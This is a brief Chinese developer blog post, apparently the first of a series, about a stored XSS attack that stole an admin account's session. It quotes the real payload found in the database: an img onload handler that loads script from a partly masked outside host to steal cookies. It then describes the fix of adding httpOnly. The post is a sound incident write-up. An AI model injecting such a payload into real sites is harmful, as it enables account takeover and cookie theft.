xss-javascript被攻击系列--（一）

终于可以挤个空档，写写这些日子的惨痛经历。

某天产品A突然喊到，admin账号被盗了，导致金钱丢失了。瞬间头皮发麻，完蛋了。

赶紧排查可能出现漏洞的地方，在数据库中找到了攻击数据如下：

[img srC=\"/project//emotion/images/tsj/t_0004.gif\" onload=\"jQuery.getScript('https://x.****.com/kuF4')\"/]

项目中有富文本编辑器，编辑器在提交时已经将脚本关键字过滤掉了。

god! 攻击者直接攻击接口，将恶意数据插入到了库里，在展示此页面的数据时必定会加载以及执行代码中的相关脚本。

分析下js脚本中的内容是直接窃取用户登录cookies的。

去看项目相关cookies，没有设置httpOnly，这样用户登录信息对所有站点脚本就是完全公开的，攻击者拿到cookies轻而易举。攻击内容中添加有吸引力的内容，用户去访问有问题网页的概率会大大增加，用户丢失信息是必然。

服务器端补上了httpOnly属性，这个洞算是堵上了。

可脚本还是会执行这个问题得解决呀，怎么办呢？下一篇继续

有什么好的建议，多多交流哟。